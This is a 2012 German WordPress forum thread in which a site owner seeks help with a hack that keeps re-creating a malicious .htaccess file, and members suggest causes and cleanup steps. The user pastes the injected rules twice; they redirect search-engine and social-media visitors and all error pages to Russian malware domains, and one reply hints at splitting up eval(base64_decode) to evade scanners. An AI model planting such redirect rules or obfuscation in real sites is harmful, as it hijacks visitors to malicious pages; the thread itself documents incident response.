1. Herzlich willkommen bei WPDE.org, dem grössten und ältesten deutschsprachigen Community-Forum rund um das Thema WordPress. Du musst angemeldet oder registriert sein, um Beiträge verfassen zu können.
    Information ausblenden

Seite gehackt, komplette Neuinstallation und trotzdem noch Probleme? Uff...

Dieses Thema im Forum "Allgemeines" wurde erstellt von Jannemann23, 18. Mai 2012.

  1. Jannemann23

    Jannemann23 Active Member

    Registriert seit:
    23. Juni 2010
    Beiträge:
    28
    Zustimmungen:
    0
    Hallo allerseits,

    bekomme gleich einen Nervenzusammenbruch... Meine Seite wurde gehackt, so dass Aufrufe der Domain und auch wenn man die Seite bei Google suchte, alle auf russische Seiten geleitet wurden. Viel informiert wieso und warum und zu dem Schluss gekommen, dass da wohl nur eine Neuinstallation hilft... nun habe ich alle Datenbanktabellen gelöscht, Alle Wordpress Files vom Server und auch alle Passwörter geändert.

    Alles ganz neu aufgespielt und was sehe ich gerade: Irgendwoher kommt schon wieder eine .htaccess Datei auf dem root Server in der Folgendes steht:

    <IfModule mod_rewrite.c> RewriteEngine On RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|youtube|wikipedia|msn|bing|4search|facebook|ebay|vk|twitter|myspace)\.(.*) RewriteRule ^(.*)$ http://flight-sengi.ru/917?2 [R=301,L] </IfModule>
    ErrorDocument 400 http://flight-sengi.ru/917?2 ErrorDocument 401 http://flight-sengi.ru/917?2 ErrorDocument 403 http://flight-sengi.ru/917?2 ErrorDocument 404 http://flight-sengi.ru/917?2 ErrorDocument 500 http://flight-sengi.ru/917?2

    ____

    Bitte wo kann das denn herkommen?!?! Bisher dachte ich das sind Hacker, aber nun bin ich überzeugt das sind Zauberer :)
    Naja, Spass beiseite, bin echt verzweifelt...
    Wenn man die .htaccess Datei löscht kommt sie wieder ...
    Weiß jemand einen Rat oder ist auch Gegen-Zauberspruch?!?

    Grüße !
    J
     
  2. mfitzen

    mfitzen Well-Known Member

    Registriert seit:
    9. Juli 2006
    Beiträge:
    9.820
    Zustimmungen:
    2
    Dein PC könnte infiziert sein, sodass der Angreifer immer wieder die aktuellen Zugangsdaten des FTP Accounts abfangen kann. Welches FTP Tool verwendest Du? Der Passwortmanager von Filezilla ist ein beliebtes Angriffsziel, da dieser die Verbindungsdaten (sofern das Speichern erlaubt wurde) im Klartext abspeichert.

    Ansonsten sind beliebte Angriffsziele veraltete WordPress Versionen, Plugins (Stichwort TimThumbs) oder Themes
     
    #2 mfitzen, 18. Mai 2012
    Zuletzt bearbeitet: 18. Mai 2012
  3. Jannemann23

    Jannemann23 Active Member

    Registriert seit:
    23. Juni 2010
    Beiträge:
    28
    Zustimmungen:
    0
    Das könnte es sein...

    ...das ist ja echt eine Plage...
    dann muss ich mal einen anderen ftp client benutzen...bzw auf mal filezilla updaten...und noch mal das FTP Passwort ändern...

    könnte es sonst noch eine andere möglichkeit geben?

    LiebeGrüße und gute Nacht erstmal...
     
  4. Hille

    Hille Well-Known Member

    Registriert seit:
    22. Januar 2012
    Beiträge:
    7.965
    Zustimmungen:
    9
    Nein, du mußt keinen anderen FTP-Client benutzen. Du musst einfach mal deinen PC auf Malware, Viren usw. überprüfen bzw. deine Anwendungen aktuelle halten. Wenn man einige Grundlegende Dinge beachtet, ist es eigentlich gar nicht so einfach, eine Wordpress Installation zu kompromittieren. Aber das unterschätzen eben viele Anwender einfach ...
     
  5. mfitzen

    mfitzen Well-Known Member

    Registriert seit:
    9. Juli 2006
    Beiträge:
    9.820
    Zustimmungen:
    2
    Vor allen Dingen keine Passwörter über den Passwortmanager speichern. Ich hatte dies bereits vor längerer Zeit im Filezilla Forum angemahnt, doch da sah man scheinbar keine Notwendigkeit die Datei zu verschlüsseln.

    Wenn ich mich nicht irre, muss man sogar explizit einstellen, dass Verbindungsdaten nicht gespeichert werden. Siehe Einstellungen->Oberfläche->Verhalten->Passwörter nicht speichern->Haken setzen
     
  6. r23

    r23 Well-Known Member

    Registriert seit:
    9. Dezember 2006
    Beiträge:
    7.317
    Zustimmungen:
    582
    Du musst leider die Sicherheitslücke finden. In der Regel ist dies ein schrottiges WP-Plugin.

    Hier eine kleine Auswahl der WP Plugin Entwickler
    http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=Wordpress


    das Verzeichnis ist vermutlich für PHP schreibbar. Erstelle für den Test einfach eine gültige .htaccess ohne die unsägliche Weiterleitung und ändere die Rechte auf 444 - Wenn du glück hast, ändert das Script die
    Rechte der .htaccess nicht....


    in einem Deiner PHP Scripte hat der Hacker eine Zeile PHP code versteckt - In dieser prüft er, ob die .htaccess vorhanden ist und erstellt diese oder er erweitert diese ...

    in einer PHP-Datei . z.b. bevorzugt die wp-settings hast du dann eine
    Zeile

    PHP:
    Entschuldige, aber du musst dich registrieren oder anmelden um den Inhalt sehen zu können!
    hilft dir dies etwas weiter?

    ralf
     
  7. Jannemann23

    Jannemann23 Active Member

    Registriert seit:
    23. Juni 2010
    Beiträge:
    28
    Zustimmungen:
    0
    Hallo und guten morgen!

    Erst einmal super vielen Dank für die Antworten – allein würde ich nun ein wenig dumm da stehen…

    @infected: Du meinst also wenn ich mit Filezilla die Passwörter nicht speicher, kann ich Filezilla ruhig weiter verwenden? Natürlich ist mein Vertrauen momentan ein wenig geschädigt. Dass es so ein Minenfeld sein kann einen Wordpress Blog zu machen hätte ich nicht gedacht. (find deine Signatur gut – bin wohl derzeit eher Baum J) Jedenfalls habe ich den Haken nun mal gesetzt und werde ihn auch nicht mehr heraus nehmen und ich mache gerade ein Filezilla update.

    Also Avast und Avira finden mal nichts auf meinem Rechner…


    @r23: Ja, mmhh.. Die Sicherheitslücke. Beim frisch aufgespielten Wordpress waren ja noch keine Plugins in Verwendung. Die Frage ist für mich, wie kommt der Code da schon wieder rein der die .htaccess erzeugt?, wenn ich gerade eine neue Wordpress Software auf den komplett leeren Server geladen habe?
    Was auch komisch ist: Wenn ich bei BulletProofSec die .htaccess auf „Proof“ schalten will (also nicht default) funktioniert die ganze seite nicht mehr…mehrere Plugins (auch 6scan) spucken fehlermeldungen aus, wenn sie die .htaccess securen wollen. (6scan: There was a problem registering your site with 6Scan: Failed to connect to 108.59.1.37: Permission denied.) Auch wenn ich für kurze Zeit die Schreibberechtigung erteile…kann evt. Auch am Server liegen…

    Derzeit habe ich die .htaccess von Bulletproof generieren lassen (auf default) und diese hat nur leseberechtigung 444. Die .htaccess im root folder sollte also nicht weiterleiten – trotzdem, wenn ich derzeit die domain eingebe lande ich wieder bei google und auch wenn ich die site suche bei google und die seite öffnen will, werde ich wieder zur google suche weiter geleitet. Kann es sein, dass mein Browser oder google selber sich gemerkt hat, dass mal eine „kritische Weiterleitung“ bestand und sich das nun gemerkt hat?!?
    Beim Chrome Browser werde ich zur Seite http://cc-sengi.ru/71?2 weitergeleitet obwohl alle security und malware scanner (habe nun ca. 10 Stück laufen lassen) nichts finden… moment – kurzer Wutausbruch:ahhhhhhhhhh!!! :-x:-x


    Ein „eval(base64_decode“ steht nicht in Wp_settings und auch sonst nirgends , habe alle files auch gerade mit dem Exploid Scanner plugin gescannt auf irgendwelche „eval“’s hin.
    Level Warning (5 matches)
    Location / Description
    What was matched
    wp-includes/images/crystal/license.txt
    Modified core file

    See what has been modified
    wp-includes/js/scriptaculous/MIT-LICENSE
    Modified core file

    See what has been modified
    wp-includes/js/tinymce/plugins/wpfullscreen/css/wp-fullscreen.css
    Modified core file

    See what has been modified
    wp-content/plugins/akismet/admin.php:264
    iframes are sometimes used to load unwanted adverts and code on your site

    <iframe src="<?php echo $url; ?>" width="100%" height=
    wp-content/themes/7a_Layout_FKC/script.js:133
    JavaScript sometimes used to hide suspicious code

    var s = String.fromCharCode(92);

    Wenn ich auf „see what has been modified“ links gehe, sagt er: Changes made to wp-includes/js/tinymce/plugins/wpfullscreen/css/wp-fullscreen.css - Sorry, an error occured. Please try again later.

    Auch ein wenig komisch find ich…


    Überall sind wieder diese Index.php’s in denen steht:
    <?php
    // Silence is golden.
    ?>

    Der Sucuri SiteCheck findet wieder Domains in etlichen directories:
    Suspicious domain detected.
    Details: http://sucuri.net/malware/malware-entry-mwblacklisted35
    Location: http://ccsengi.ru/19?2

    Das kann doch alles nicht sein!
     
  8. mfitzen

    mfitzen Well-Known Member

    Registriert seit:
    9. Juli 2006
    Beiträge:
    9.820
    Zustimmungen:
    2
    Ja, das meine ich. Wie gesagt, wenn Du die Zugangsdaten speicherst und Dein PC infiziert ist, hat der Angreifer leichtes Spiel. Selbst schon erlebt. Alternative für Windoof wäre WinSCP oder das kostenpflichtige FlashFXP

    Das Avast und Antivir nichts finden, muss nicht unbedingt heißen, dass nicht doch was da ist. Lade Dir mal die Kaspersky Rescue CD herunter, starte Deinen Rechner von der CD aus, aktualisiere anschließend die Definitionen und lass dann mal alles scannen.

    Dieses Silence is golden hat nichts mit dem Angriff zu tun. Das gehört zur WP Installation. Das muss so sein. Schau Dir zum Vergleich mal ein frisches WP Paket an. Du wirst sehen, dass diese Zeilen von den Entwicklern eingebaut wurden.
    Solange nur
    Code:
    Entschuldige, aber du musst dich registrieren oder anmelden um den Inhalt sehen zu können!
    in der Datei steht ist alles in Ordnung.
     
    #8 mfitzen, 19. Mai 2012
    Zuletzt bearbeitet: 19. Mai 2012
  9. r23

    r23 Well-Known Member

    Registriert seit:
    9. Dezember 2006
    Beiträge:
    7.317
    Zustimmungen:
    582
    Du stellst halt keine Informationen zur Verfügung. Ich glaube aber nicht, dass es an einem gehackten Cleint liegt. Dies kommt sicherlich auch mal vor - aber wenn ich einen cleint - einen Rechner knacken würde - würde ich sicherlich keine WP Weiterleitung umständlich einrichten sondern mir die Bankdaten aus Online Banking holen oder anderes mit Wert.

    Bei einem gehackten WP System reicht es nicht aus, dass du eine eine _frische_ WP Version hoch lädst, sondern du darfst keiner Datei mehr trauen.

    Der übliche WP Angreifer legt sich in ein Verzeichnis in der Regel seine Scripte, damit kann er *jederzeit* erneut Zugriff auf dein System halten.

    Somit erlaube die Frage, von welcher WP Version sprichst du - und hast du wirklich alles gelöscht? Ich könnte meine Bilder nicht löschen... und genau zwischen den Bildern sinda dann diese fremde Scripte..

    Wenn dein WP wirklich frisch war, kann es auch einer blöden Sicherheitslücke in PHP CGI liegen. PHP muss als cgi laufen (nicht Fastgci oder Apache Modul)

    http://www.heise.de/newsticker/meldung/Gefahr-durch-offene-PHP-Luecke-1567433.html

    ach doch leer ... War der Server neu? oder hat der Angreifer sich bei seinem letzten Angriff einen Zugang eingerichtet? Mal einen Blick in die Server Logs geworfen.

    Wenn der Angriff über FTP mit deinen zugangsdaten erfolgte, lag es an deinem Cleint... und nicht an einer Sicherheitslücke auf einer Andendung auf dem Server...

    ach ja und welche Themes hatte deine WP Version?


    cu

    ralf
     
  10. r23

    r23 Well-Known Member

    Registriert seit:
    9. Dezember 2006
    Beiträge:
    7.317
    Zustimmungen:
    582
    Warum nimmst du keinen richtigen Editor und erstellst dir diese Datei selber?

    Man kann die Rechte von Dateien ändern - Dies geht mit allen Scripten (perl, php usw.) kommt hat drauf an, was man wie konfiguriert.


    Normalerweise nicht zu Google... In den letzten Monaten hatte ich leider einige Kunden die dieses Problem auch hatten.

    Bei einem wurde bei jedem WP Update mal eben ein zwei Scripte geändert damit die Weiterleitung funktioniert.

    Bei anderen wurde die Weiterleitung in Scripte versteckt

    Google und andere warnen selbstverständlich vor kritische Weiterleitungen,
    http://googlewebmastercentral-de.blogspot.de/2012/01/was-tun-bei-malware.html

    Es gibt Dienstliester, die dir bei WP helfen können - ich kenne mindestens einen ;)


    Dir ist bekannt, dass man Strings auch zusammen bauen kann

    eval(...b.a.se6.4_de.code.....

    die pünktchen vor dem b habe ich jetzt nicht veröffentlicht. Dies ist seit Monaten so überlich, da ein Suchen nach eval(base64_decode zu einfach war...

    Timthumb in Verwendung?
    http://www.heise.de/security/meldung/Kritische-Sicherheitsluecke-in-Wordpress-Addon-Timthumb-1317795.html

    Viel Glück

    ralf
     
  11. mfitzen

    mfitzen Well-Known Member

    Registriert seit:
    9. Juli 2006
    Beiträge:
    9.820
    Zustimmungen:
    2
    Da hast Du glaube ich etwas verwechselt. Der Server MUSS FastCGI oder das Apache Modul nutzen, wenn diese Sicherheitslücke ausgeschlossen werden soll.

    Jeder halbwegs vernünftige Hoster sollte da mittlerweile entsprechend gehandelt haben...
     
    #11 mfitzen, 19. Mai 2012
    Zuletzt bearbeitet: 19. Mai 2012
  12. Hille

    Hille Well-Known Member

    Registriert seit:
    22. Januar 2012
    Beiträge:
    7.965
    Zustimmungen:
    9
    Bei welchem Anbieter bis du eigentlich? Du hast doch ein Webhosting Paket, oder?
     
  13. Jannemann23

    Jannemann23 Active Member

    Registriert seit:
    23. Juni 2010
    Beiträge:
    28
    Zustimmungen:
    0
    und weiter gehts...

    Hallo allerseits!

    Danke noch malig für die Antworten! Sorry wenn ich länger brauche um zu Antworten, aber mit meinem bescheidenen Wissen in diesem Feld dauert das „Verarbeiten“ der guten Informationen hier ein wenig! J

    Das dieses „Silence is golden“ dazu gehört ist schon mal beruhigend!

    @r23 – ja, hatte wirklich alles vom Server geschmissen. Log Files anschauen klingt gut, diese sind mit meinem Zugang auf den Server aber nicht auffindbar... Ist ein wenig „unglücklich“ die Situation – mache die Site für eine Kambodschanische Schule. Welche Zusätzlichen Infos wären denn hilfreich? Damit will ich nicht geizen ;)

    • Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7e
    • MySQL-Client-Version: 5.0.32
    • PHP Erweiterung: mysql [​IMG]
    Und ich denke das mit dem Server ist derzeit auch eines meiner Hauptprobleme
    Der Server nennt sich supremecenter104.com und ich habe einen User+Passwort bekommen. Ehrlich gesagt, keine Ahnung ob dieses supremecenter.com wirklich seriös ist. Was macht das auf euch für einen Eindruck?
    Komme da nur ins PHPAdmin + ich habe die FTP Zugangsdaten. Habe die Seite von jemanden übernommen, dem die Domain und auch das Hostingpaket gehört und den muss ich auch immer anschreiben zwecks Passwortänderungen etc. Würde der Schule auch vorschlagen zu wechseln auf einen „sichereren“ Server, aber der Typ hat sich aber die Domain der Schule Khmerchild.org gesichert und ich weiß gar nicht ob der die hergibt – abgesehen davon, dass ich mich erst mal erkundigen müsste, wie ich die Domain auf einem anderen Hostpaket nutzen kann – kenne nur die gesamtpakete zB von GoDaddy wo die Domain dabei ist… kann man die Domain einfach übernehmen? Oh man…

    Zu eval(...b.a.se6.4_de.code -> das müsste der Expoid Scanner doch finden oder? Ich mein, der Entwickler des PlugIns macht sich hoffentlich auch seine Gedanken oder? Oder doch nicht? J

    Timthumb: timthumb.php ist keine auf meinem Server…und war auch nicht in den alten Dateien die vorher oben waren…

    Zum Theme: Das habe ich mit der Artisteer Software erstellt… Wie sicher das ist weiß ich nicht… Sollte aber schon sicher sein…Hatte aber auch schon die Idee alles noch einmal frisch aufzuspielen ohne das Theme und mal zu schauen ob es dann weg ist. Kann man heraus finden ob ein Theme sicher ist?!


    Habe jetzt gerade noch mal in die .htaccess geschaut und da steht auf einmal folgendes:
    (Die .htaccess hat aber die ganze Zeit nur 444 also die Leseberechtigung!!?? – das heißt das Script ändert auch die Rechte der Datei oder?!)

    ________________________
    <IfModule mod_rewrite.c> RewriteEngine On RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite|altavista|msn|netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos|search|metacrawler|bing|dogpile|facebook|twitter|blog|live|myspace|mail|yandex|rambler|ya|aport|linkedin|flickr|nigma|liveinternet|vkontakte|webalta|filesearch|yell|openstat|metabot|nol9|zoneru|km|gigablast|entireweb|amfibi|dmoz|yippy|search|walhello|webcrawler|jayde|findwhat|teoma|euroseek|wisenut|about|thunderstone|ixquick|terra|lookle|metaeureka|searchspot|slider|topseven|allthesites|libero|clickey|galaxy|brainysearch|pocketflier|verygoodsearch|bellnet|freenet|fireball|flemiro|suchbot|acoon|cyber-content|devaro|fastbot|netzindex|abacho|allesklar|suchnase|schnellsuche|sharelook|sucharchiv|suchbiene|suchmaschine|web-archiv)\.(.*)
    RewriteRule ^(.*)$ http://key-midi.ru/lambada?2 [R=301,L]
    RewriteCond %{HTTP_REFERER} ^.*(web|websuche|witch|wolong|oekoportal|t-online|freenet|arcor|alexana|tiscali|kataweb|orange|voila|sfr|startpagina|kpnvandaag|ilse|wanadoo|telfort|hispavista|passagen|spray|eniro|telia|bluewin|sympatico|nlsearch|atsearch|klammeraffe|sharelook|suchknecht|ebay|abizdirectory|alltheuk|bhanvad|daffodil|click4choice|exalead|findelio|gasta|gimpsy|globalsearchdirectory|hotfrog|jobrapido|kingdomseek|mojeek|searchers|simplyhired|splut|the-arena|thisisouryear|ukkey|uwe|friendsreunited|jaan|qp|rtl|search-belgium|apollo7|bricabrac|findloo|kobala|limier|express|bestireland|browseireland|finditireland|iesearch|ireland-information|kompass|startsiden|confex|finnalle|gulesider|keyweb|finnfirma|kvasir|savio|sol|startsiden|allpages|america|botw|chapu|claymont|clickz|clush|ehow|findhow|icq|goo|westaustraliaonline)\.(.*)
    RewriteRule ^(.*)$ http://key-midi.ru/lambada?2 [R=301,L]
    </IfModule>

    # BULLETPROOF PRO 5.D DEFAULT .HTACCESS

    # If you edit the line of code above you will see error messages on the BPS Security Status page
    # WARNING!!! THE default.htaccess FILE DOES NOT PROTECT YOUR WEBSITE AGAINST HACKERS
    # This is a standard generic htaccess file that does NOT provide any website security
    # The DEFAULT .HTACCESS file should be used for testing and troubleshooting purposes only

    # BEGIN WordPress
    <IfModule mod_rewrite.c>
    RewriteEngine On
    RewriteBase /
    RewriteRule ^index\.php$ - [L]
    RewriteCond %{REQUEST_FILENAME} !-f
    RewriteCond %{REQUEST_FILENAME} !-d
    RewriteRule . /index.php [L]
    </IfModule>

    # END WordPress

    ErrorDocument 400 http://key-midi.ru/lambada?2
    ErrorDocument 401 http://key-midi.ru/lambada?2 ErrorDocument 403 http://key-midi.ru/lambada?2 ErrorDocument 404 http://key-midi.ru/lambada? ErrorDocument 500 http://key-midi.ru/lambada?2 _____________________________________________________
    Wie und wo in der PHP ist denn das Script versteckt . Und wie haben die es auf den Leeren Server wieder bekommen ..

    @infected: Werde das mit der kapersky rescue cd auch mal probieren…

    Das kann noch was werden …
    Oje..

    Danke aber!!!!
    Lg
     
  14. Jannemann23

    Jannemann23 Active Member

    Registriert seit:
    23. Juni 2010
    Beiträge:
    28
    Zustimmungen:
    0
    ..

    Da bin ich mir gar nicht so sicher ob dieser supremecenter104.com dingsbumsserver soweit ist...
     
  15. Jannemann23

    Jannemann23 Active Member

    Registriert seit:
    23. Juni 2010
    Beiträge:
    28
    Zustimmungen:
    0
    Ehrlich gesagt...

    ...check ich das mit dem Supremeserver.com überhaupt nicht, was das sein soll...:confused:
     
  16. Jannemann23

    Jannemann23 Active Member

    Registriert seit:
    23. Juni 2010
    Beiträge:
    28
    Zustimmungen:
    0
    Nochmaliger Versuch...

    Also folgendes:
    Habe per Filezilla das komplette Rootverzeichnis gelöscht - tutti completti - und Wordpress 3.3.2 ungezipt hochgeladen - quasi ready to install

    und schwupps ist schon wieder die .htaccess da mit dem code, der auf der russische Seite routet...

    daraus schließe ich: der Code muss immer wieder eingeschleust werden, entweder vom Server aus, oder von meinem Rechner (Client)

    am I wrong?!
    am I verzweifelt -> definately yes

    :(
     
  17. dietergotzen

    dietergotzen Well-Known Member

    Registriert seit:
    24. Oktober 2008
    Beiträge:
    64
    Zustimmungen:
    0
    Da ich vor drei Jahren ein ähnliches Problem hatte, wäre mein Lösungsvorschlag:

    - WP lokal auf Deinem Rechner z. B. über Xampp zu installieren

    Wenn dann keine Manipulation an Deiner Installation statt findet, liegts am Provider. Du fummelst dich ansonsten wirklich tot.

    Es gibt auch mehrere Tools wie z. B. firebug, wo man den Schadcode mit lokalisieren kann. Wahrscheinlich findet sich der Schadcode in der DB wieder, und von daher würde ich auch erst mal die Datenbank sichern und nach entsprechenden Stellen suchen lassen.

    Viel Erfolg und lange Nächte

    Dieter
     
  18. Jannemann23

    Jannemann23 Active Member

    Registriert seit:
    23. Juni 2010
    Beiträge:
    28
    Zustimmungen:
    0
    ...

    Danke Dieter!

    Wenn ich Xampp installiere funktioniert Xampp als quasi "Web Host" auf meinem Rechner (wenn dieser an ist)?

    Wie lasse ich in den downgeloadeten Datenbank Tabellen nach dem Schadcode suchen? Mit dem normalen Virenscanner?

    Lg
    Jan
     
  19. Jannemann23

    Jannemann23 Active Member

    Registriert seit:
    23. Juni 2010
    Beiträge:
    28
    Zustimmungen:
    0
    Was mir auch noch nicht klar ist, wenn ich auch alle Tabellen in der SQL Datenbank gelöscht habe, wie kann der Schadcode in der DB liegen?

    Liebe Grüße!!
     
  20. Jannemann23

    Jannemann23 Active Member

    Registriert seit:
    23. Juni 2010
    Beiträge:
    28
    Zustimmungen:
    0
    Und wenn die (wer auch immer) Zugang zu meinem Wordpress haben (und somit auch zur Datenbank - da ja die zugangsdaten in der config stehen) können "die" noch irgendeinen Schadcode beim Host selber hinterlegen? Muss nicht alles von denen weg sein, wenn ich per filezilla ftp das ganze root verzeichnis lösche UND die DB Tabellen im PHP Admin lösche?! *verwirr sei*

    :?
     
  1. Diese Seite verwendet Cookies, um Inhalte zu personalisieren, diese deiner Erfahrung anzupassen und dich nach der Registrierung angemeldet zu halten.
    Wenn du dich weiterhin auf dieser Seite aufhältst, akzeptierst du unseren Einsatz von Cookies.
    Information ausblenden
  1. Diese Seite verwendet Cookies, um Inhalte zu personalisieren, diese deiner Erfahrung anzupassen und dich nach der Registrierung angemeldet zu halten.
    Wenn du dich weiterhin auf dieser Seite aufhältst, akzeptierst du unseren Einsatz von Cookies.
    Information ausblenden